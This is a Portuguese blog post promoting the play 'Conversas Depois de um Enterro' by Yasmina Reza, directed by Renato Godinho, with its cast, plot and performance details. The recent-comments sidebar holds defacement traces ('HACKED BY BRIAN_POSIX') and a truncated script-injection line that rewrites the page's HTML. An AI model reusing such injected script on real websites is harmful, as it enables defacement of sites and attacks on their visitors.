oqueaconteceporai @ 18:30

Qua, 06/03/13

Custódia Gallego, Filipe Duarte, João Cabral, Lúcia Moniz, Manuel Cavaco e Sofia Nicholson, foram desafiados pelo arrojo e pela saudade de palco. O convite de Renato Godinho, que encena o espectáculo, proporcionou uma inesperada comunhão de vontades e desejos que levou este maravilhoso grupo de actores a pegar numa história de Yasmina Reza, a primeira que escreveu para Teatro, e a viverem uma família de personagens à procura de paz.

 

Contrastando com a busca familiar que caracteriza o enredo da peça, está a determinação das pessoas que dão vida a este projecto em contrariar o cinzentismo teimoso e o conformismo viral. Sem subsídios, sem uma grande produtora por trás, mas com a inabalável determinação de quem sabe o que quer, e ama o que faz.

 

Este é a história de “Conversas Depois de um Enterro”: O patriarca Simão Aguilar faleceu, e, de acordo com os seus desejos, acaba de ser enterrado, não ao lado da sua mulher, no cemitério, mas nas suas próprias terras.

 

Reunidos estão os três filhos, todos nos seus quarenta anos: Jaime (joão Cabral), Edite (Sofia Nicholson) e Alex (Filipe Duarte). Também lá estão Pedro (Manuel Cavaco), o tio do lado da mãe, e a sua mulher, Júlia (Custódia Gallego), bem como Elisa (Lúcia Moniz). Elisa é a “outsider” apesar de ter sido namorada de Alex, quem ela amava realmente era o seu irmão Jaime. O que se desenrola a partir daqui, é um enredo familiar, com muitos momentos de humor. Há as tensões que são expectáveis em qualquer reunião de família, e os esforços para chegar a termos.

 

Com o passado, presente e futuro. Ao pai é dado o descanso, mas a sua presença ainda é sentida. À medida que alguns factos inesperados são revelados, a imagem que a família tinha do pai, transforma-se. É aqui onde os valores familiares são construídos, que o vazio deixado pelo falecido dá lugar à comunhão por que todos ansiavam há muito.

 

“Conversas Depois de um Enterro”, de Yasmina Reza, é apresentado pelo Montepio, tem encenação de Renato Godinho, e interpretação de Custódia Gallego, Filipe Duarte, João Cabral, Lúcia Moniz, Manuel Cavaco e Sofia Nicholson e estará em cena de 1 a 17 de Março no Teatro Municipal Mirita Casimiro, no Estoril, de onde partirá para uma digressão pelo país.

 

Os espectáculos são de 5ª a Sábado às 21h30 e Domingo às 16h. Os bilhetes estão à venda nos locais habituais com o preço a variar entre os 10 e os 15€.

 

Por isso já sabe! Não perca esta antevisão com Renato Godinho, Sofia Nicholson e Custódia Gallego. No Mais Mulher desta quinta-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO